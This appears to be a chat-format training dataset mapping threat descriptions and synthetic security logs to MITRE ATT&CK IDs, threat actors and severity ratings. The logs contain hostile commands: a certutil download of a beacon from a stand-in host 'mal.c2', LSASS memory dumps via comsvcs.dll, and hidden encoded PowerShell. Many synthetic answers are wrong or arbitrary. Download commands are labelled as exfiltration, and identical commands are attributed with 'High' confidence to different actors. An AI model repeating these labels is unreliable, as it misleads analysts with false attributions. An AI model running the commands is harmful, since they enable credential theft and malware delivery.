messages
listlengths
2
2
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: POWERSTATS has used get_tasklist to discover processes on the compromised host.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1057\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, Base64, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\": \"High\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-V3MXPFOFLQ)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Command and Control, Defense Evasion", "role": "user" }, { "content": ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 502 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.69.37.221", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0007\"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.57.61.218", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0006\"], \"techni...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2268 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, WMI, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", \"...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: RTM can obtain information about security software on the victim.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1518.001\", \"T1518\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-R27C3M4INA)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Lateral Movement, Impact, Command and Control", "role": "user" }, { ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: APT28 has mapped network drives using Net and administrator credentials.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1021\", \"T1021.002\"]}", "role": "assistant"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.70.45.248", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0010\"], \"techniqu...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-RC1I0KYF39)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Reconnaissance, Impact, Command and Control", "role": "user" }, { "c...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 3968 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.182.38.128", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"technique...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-CP34LK0250)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Defense Evasion, Credential Access", "role": "user" }, { "conte...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"Mustang P...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: KeyBoy can gather extended system information, such as information about the operating system, disks, and memory.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1082\"]}...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: OSInfo discovers shares on the network", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1135\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: The presence of the com.apple.quarantine quarantine flag can be checked with the xattr command xattr -l /path/to/examplefile.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T15...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3036 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Base64, Fileless", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.73.226.62", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0043\"], \"techniques\": [...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: RTM has been delivered as archived Windows executable files masquerading as PDF documents.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1036\"]}", "role": "assistant" ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Winnti for Windows can check if the explorer.exe process is responsible for calling its install function.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1057\"]}", "...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.106.190.246", "role": "user" }, { "content": "{\"tactics\": [\"T...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 615 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Base64, WMI", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confide...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Also look for any process API calls for behavior that may be indicative of Process Injection.", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"techniques\": [\"T1548\"]}", "...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-MVSKEVEFZ5)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Collection, Command and Control, Exfiltration", "role": "user" }, { "con...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.90.205.47", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0002\", \"TA0001\"], \"techniques\": [\"...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.", "role": "user" }, { "content": "{\"tactics\": ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: GreyEnergy encrypts its configuration files with AES-256 and also encrypts its strings.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}", "role": "assistant"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"conf...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2095 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: menuPass has used Putty Secure Copy Client (PSCP) to transfer data.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1021\", \"T1021.004\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 851 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Base64, TLS", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"co...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Many Misdat samples were programmed using Borland Delphi, which will mangle the default PE compile timestamp of a file.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T10...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: menuPass has attempted to get victims to open malicious files such as Windows Shortcuts (.lnk) and/or Microsoft Office documents, sent via email as part of spearphishing campaigns.", "role": "user" }, { "conten...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1669 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2529 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: BootComplete starts the AutoStartup service and the AutoStartup service makes sure that MainActivity is always running", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1543.003\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-NX0H2GT2MW)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance", "role": "user" }, { "content": "{\"severity\": \"C...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Strider has used local servers with both local network and Internet access to act as internal proxy nodes to exfiltrate data from other parts of the network without direct Internet access.", "role": "user" }, { ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: UPPERCUT has the capability to gather the victim's proxy information.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1016\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.45.131.81", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techn...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.190.52.61", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, TLS, Base64", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confide...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.115.239.103", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: wmic.exe is a powerful, native Windows command line utility used to interact with Windows Management Instrumentation (WMI)", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1047\"]}", "ro...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-Z3AXCYLZYD)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Execution, Persistence", "role": "user" }, { "content": "{\"severi...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2720 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3855 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.6.128.130", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0005\", \"TA0009\"], ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: and look for common keylogging API calls.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0009\"], \"techniques\": [\"T1056.001\", \"T1056\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-UN0ORGEDOI)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Execution, Credential Access", "role": "user" }, { "content": "{\"...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Exaramel for Windows specifies a path to store files scheduled for exfiltration.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1074.001\", \"T1074\"]}", "role": "as...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Pisloader has a command to upload a file to the victim machine.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: load additional modules", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1129\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-9TCIABGDH4)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Credential Access, Impact, Defense Evasion", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-KB5JAKO7R9)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Execution", "role": "user" }, { "content": "{\"severity\": \"Criti...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-KBXLBHEWS8)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severity\": \"Critical...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Pysa has used RSA and AES-CBC encryption algorithm to encrypt a list of targeted file extensions.", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1486\"]}", "role": "...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"tec...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, LOLBin, WMI", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidenc...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-3H4T44G4O0)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Command and Control, Initial Access", "role": "user" }, { ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Kasidet has the ability to identify any anti-virus installed on the infected system.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1518.001\", \"T1518\"]}", "role":...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, Fileless, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"co...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.96.64.24", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1484.00...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"conf...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confiden...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: WMI, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\": \"High\"}"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.17.106.204", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\"], \"techniques\": [\"T154...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: TLS, LOLBin, WMI", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidence\": \"High\"}"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.84.241.174", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-X7P40T2GYN)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Credential Access, Impact", "role": "user" }, { "content": "{\"severity...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.167.43.65", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techni...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Monitor interactions with images and containers by users to identify ones that are added anomalously.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1525\"]}", "role...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-T9SSZD915Q)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Privilege Escalation, Command and Control, Defense Evasion", "role": "u...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, TLS, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"c...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-HGW26HO9F3)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Persistence, Defense Evasion, Initial Access", "role": "user" }, { ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3390 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, Base64, TLS", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", \"con...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.67.83.81", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0006\"], \"techniques\": [\"T1...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.58.207.231", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0008\", \"TA0011\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: WMI, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\": \...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: In PowerShell, an adversary may make associated changes to user settings using commands similar to Set-ADUser -AllowReversiblePasswordEncryption $true.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: lists the running processes", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1057\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: The skills needed may be located in-house, or may need to be contracted out.", "role": "user" }, { "content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1587\", \"T1587.004\", \"T1587.001\"]}", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-1EKDJK4RHR)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Discovery, Privilege Escalation", "role": "user" }, { "content": "{\"severi...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-CX09Q7DKJO)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"severity\": \"High...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Tropic Trooper has exfiltrated data using USB storage devices.", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1052\", \"T1052.001\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-XWVB3HL48M)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"severity\": ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.109.42.189", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0043\", \"TA0002...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-30UO5TRAGS)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Execution, Credential Access", "role": "user" }, { "content": "{\"severit...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-UBCJJXNT6M)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Command and Control", "role": "user" }, { "content": "{\"seve...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.175.196.244", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\":...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.103.234.55", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA001...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-9AFET1G0XZ)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Exfiltration", "role": "user" }, { "content": "{\"severity\":...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: This document exploited a newer vulnerability, CVE-2017-0199", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1203\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: WMI, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confidence\": \"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.195.43.21", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"t...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.26.164.125", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0011\"], \"techniques\": [\"T1484...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.13.93.55", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA0006\...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: ROKRAT can access the HKLM\\System\\CurrentControlSet\\Services\\mssmbios\\Data\\SMBiosData Registry key to obtain the System manufacturer value to identify the machine type.", "role": "user" }, { "content": "{...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-HVD7BYFNDF)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Privilege Escalation, Exfiltration", "role": "user" }, { "conten...